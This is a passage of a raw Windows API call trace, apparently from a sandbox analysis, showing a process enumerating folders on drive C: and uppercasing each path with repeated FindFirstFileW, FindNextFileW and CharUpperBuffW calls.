lpsz="C:\\MSOCACHE\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\MSOCache\\", cchLength=0xc | out: lpsz="C:\\MSOCACHE\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\MSOCache\\", cchLength=0xc | out: lpsz="C:\\MSOCACHE\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\MSOCache\\", cchLength=0xc | out: lpsz="C:\\MSOCACHE\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\MSOCache\\", cchLength=0xc | out: lpsz="C:\\MSOCACHE\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\MSOCache\\", cchLength=0xc | out: lpsz="C:\\MSOCACHE\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\MSOCache\\", cchLength=0xc | out: lpsz="C:\\MSOCACHE\\") returned 0xc [0107.461] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.461] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc 
| out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*.*", lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 0x1c9608 [0107.462] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 1 [0107.462] FindNextFileW (in: 
hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 1 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 
[0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\*.*", lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 0x1c9648 [0107.463] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0107.463] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 0 [0107.463] FindClose (in: hFindFile=0x1c9648 | out: hFindFile=0x1c9648) returned 1 [0107.463] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 0 [0107.463] FindClose (in: hFindFile=0x1c9608 | out: hFindFile=0x1c9608) returned 1 [0107.463] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.463] CharUpperBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="C:\\PROGRAM FILES\\") returned 0x11 [0107.463] CharUpperBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="C:\\PROGRAM FILES\\") returned 0x11 [0107.463] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.463] CharUpperBuffW (in: lpsz="C:\\ProgramData\\", cchLength=0xf | out: lpsz="C:\\PROGRAMDATA\\") returned 0xf [0107.463] CharUpperBuffW (in: lpsz="C:\\ProgramData\\", cchLength=0xf | out: lpsz="C:\\PROGRAMDATA\\") returned 0xf [0107.463] CharUpperBuffW (in: lpsz="C:\\ProgramData\\", cchLength=0xf | out: lpsz="C:\\PROGRAMDATA\\") returned 0xf [0107.463] CharUpperBuffW (in: lpsz="C:\\ProgramData\\", cchLength=0xf | out: lpsz="C:\\PROGRAMDATA\\") returned 0xf 
[0107.463] CharUpperBuffW (in: lpsz="C:\\ProgramData\\", cchLength=0xf | out: lpsz="C:\\PROGRAMDATA\\") returned 0xf [0107.463] CharUpperBuffW (in: lpsz="C:\\ProgramData\\", cchLength=0xf | out: lpsz="C:\\PROGRAMDATA\\") returned 0xf [0107.463] CharUpperBuffW (in: lpsz="C:\\ProgramData\\", cchLength=0xf | out: lpsz="C:\\PROGRAMDATA\\") returned 0xf [0107.463] CharUpperBuffW (in: lpsz="C:\\ProgramData\\", cchLength=0xf | out: lpsz="C:\\PROGRAMDATA\\") returned 0xf [0107.463] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: 
lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.464] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.464] FindFirstFileW (in: lpFileName="C:\\Recovery\\*.*", lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 0x1c9608 [0107.556] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 1 [0107.556] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 1 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", 
cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] 
CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] FindFirstFileW (in: lpFileName="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\*.*", lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 0x1c9648 [0107.649] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0107.649] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0107.649] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0107.649] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 0 [0107.649] FindClose (in: hFindFile=0x1c9648 | out: hFindFile=0x1c9648) returned 1 [0107.649] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 0 [0107.649] FindClose (in: hFindFile=0x1c9608 | out: hFindFile=0x1c9608) returned 1 [0107.650] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d 
[0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | 
out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] FindFirstFileW (in: lpFileName="C:\\System Volume Information\\*.*", lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 0xffffffff [0107.650] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0107.650] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.650] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.650] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.650] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.650] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.650] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.650] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.650] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.650] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.650] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.650] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 
[0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.651] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 0x1c9608 [0107.651] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 1 [0107.651] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 1 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW 
(in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\*.*", lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 0x1c9648 [0107.652] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0107.652] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: 
lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] 